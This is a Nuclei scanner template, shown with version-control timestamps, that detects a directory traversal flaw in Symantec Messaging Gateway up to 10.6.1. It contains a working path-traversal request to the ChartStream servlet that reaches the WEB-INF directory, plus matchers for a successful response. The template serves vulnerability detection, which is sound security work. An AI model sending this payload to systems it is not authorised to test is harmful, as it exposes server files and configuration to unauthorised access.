nuclei-templates/vulnerabilities/symantec-messaging-gateway....

23 lines
489 B
YAML
Raw Normal View History

2020-09-16 12:26:22 +00:00
id: symantec-messaging-gateway
2020-09-16 11:13:10 +00:00
info:
name: Symantec Messaging Gateway LFI
author: Random-Robbie
severity: medium
description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal
requests:
- method: GET
path:
- "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/"
matchers-condition: and
matchers:
- type: word
words:
- "struts-default.xml"
2020-09-16 12:26:22 +00:00
- type: status
status:
- 200